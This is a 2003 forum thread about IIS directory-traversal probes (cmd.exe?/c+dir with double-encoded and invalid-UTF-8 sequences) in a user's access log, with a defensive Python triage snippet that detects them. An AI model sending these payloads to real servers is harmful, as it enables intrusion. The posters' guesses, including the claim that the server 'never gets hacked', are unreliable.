datwig -
Joined: 26 Jan 2003 Posts: 85
Posted: Fri Feb 28, 2003 7:10 am Post subject: Am I being "hacked"?
OK, there is this weird... stuff in my access.log
Code:
208.163.143.9 - - [27/Feb/2003:21:59:23 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
208.163.143.9 - - [27/Feb/2003:21:59:24 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
208.163.143.9 - - [27/Feb/2003:21:59:24 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
208.163.143.9 - - [27/Feb/2003:21:59:25 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
208.163.143.9 - - [27/Feb/2003:21:59:26 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:27 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:28 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:28 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:29 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:30 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:31 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:32 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:34 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:35 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
Am I being hacked? That wasn't/isn't my IP.

tv2Rob -
Joined: 13 Feb 2003 Posts: 37
Posted: Fri Feb 28, 2003 7:18 am
No, you are not being "hacked"; that's just a server somewhere... still spreading this kind of useless traffic... Note the 404 and 400, meaning your server cannot and will not give it what it wants. We call things like this Code Red and stuff... Don't worry, it won't harm your computer, but it is a reminder to always keep up to date with critical security patches from MS. :wink:
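
The status-code check described in the reply above can be done mechanically. The following is an added example, not part of the original thread: it labels each request by the encoding trick in its path (double percent-encoding, or bytes that are invalid in UTF-8) and separates probes the server rejected from any it answered with a 2xx status. The sample log is constructed in the thread's format, and the two 192.0.2.10 lines are invented to show the alert path.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed sample in the format of the log excerpt in the thread.
# The 192.0.2.10 lines are invented: one answered probe, one benign request.
SAMPLE = '''\
208.163.143.9 - - [27/Feb/2003:21:59:23 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
208.163.143.9 - - [27/Feb/2003:21:59:26 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:31 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:34 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
192.0.2.10 - - [27/Feb/2003:22:10:00 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1502
192.0.2.10 - - [27/Feb/2003:22:10:05 +1133] "GET /index.html HTTP/1.0" 200 1502
'''

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+$')

def classify(target):
    """Name the probe technique in a request target, or None if it looks benign."""
    path = target.split('?', 1)[0]
    once = unquote_to_bytes(path)              # result of a single URL-decode pass
    if re.search(rb'%(5c|2f)', once, re.I):    # an encoded \ or / survives one pass
        return 'double-encoded traversal'
    if b'\xc0' in once or b'\xc1' in once:     # bytes that never occur in valid UTF-8
        return 'invalid UTF-8 traversal'
    name = once.lower().rsplit(b'/', 1)[-1]
    if name in (b'root.exe', b'cmd.exe'):
        return 'direct ' + name.decode() + ' request'
    return None

def triage(log_text):
    """Return (counts of rejected probes, list of probes answered with 2xx)."""
    rejected, answered = Counter(), []
    for m in map(LINE.match, log_text.splitlines()):
        kind = classify(m.group(2)) if m else None
        if kind is None:
            continue
        ip, status = m.group(1), m.group(3)
        if status.startswith('2'):
            answered.append((ip, kind, m.group(2)))   # needs investigation
        else:
            rejected[(ip, kind)] += 1
    return rejected, answered

if __name__ == '__main__':
    rejected, answered = triage(SAMPLE)
    print('rejected:', dict(rejected))
    print('answered with 2xx:', answered)
```
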

Dave -
Joined: 11 Feb 2003 Posts: 184 Location: United Kingdom
Posted: Fri Feb 28, 2003 10:11 am
Like tv2Rob mentioned, it could indeed be a server, or it could indeed be a hacker, however needless to say either way don't be too concerned, the hacker, if it were a hacker, he/she failed :D
_________________
Any information contained herein is provided in "as is" condition without any guarantee for its accuracy, contains no warranties - express or implied - and confers no rights.
X1 1.1.4: http://www.aprelium.com/news/abwsx1u1.html

datwig -
Joined: 26 Jan 2003 Posts: 85
Posted: Sat Mar 01, 2003 12:34 am
Dave wrote: | Like tv2Rob mentioned, it could indeed be a server, or it could indeed be a hacker, however needless to say either way don't be too concerned, the hacker, if it were a hacker, he/she failed :D |
Haha! He/she failed... Well, anyway, I'm relieved, thanks!

os17fan -
Joined: 21 Mar 2003 Posts: 531 Location: USA
Posted: Sun Apr 06, 2003 7:02 am
I think that line of code is caused by the Nimda virus, because Nimda is a virus that attaches to a code on your server and can infect your files and also slow down your internet connection. Do not leave your web server on if you see this code; just stop it and find a way to patch it so it cannot catch Nimda. I don't know a lot about Nimda, but I sure did talk to someone and I'm pretty sure it's Nimda, so be careful and find a way to patch your web server so you don't catch it 8)
_________________
This web server is the best !

os17fan -
Joined: 21 Mar 2003 Posts: 531 Location: USA
Posted: Tue Jun 03, 2003 2:21 am
I'm sorry, just in: that line of code is not Nimda! Leave your web server on if you want, Abyss never gets hacked 8)
_________________
This web server is the best !

CapFusion -
Joined: 18 May 2003 Posts: 617 Location: Lost in Abyss' Dungeon
Posted: Thu Jun 05, 2003 6:14 pm
os17fan wrote: | I'm sorry, just in: that line of code is not Nimda! Leave your web server on if you want, Abyss never gets hacked 8) |
Heeheehe..... Do not say that.... :D Actually it can get hacked. Everything can get hacked if that hacker is very good or persistent. I have tried with my old XT PC and let it hammer away. You can read my old post - http://www.aprelium.com/forum/viewtopic.php?t=1660
Just wish Aprelium could have some additional precautions like IP ban or DOS etc...
Anyway, those error logs are very common for those who have a web server or similar server. Just as long as the security patches are updated, it should not be too bad. Only those PCs that were not updated will have problems, especially those using IIS.
_________________
CapFusion,...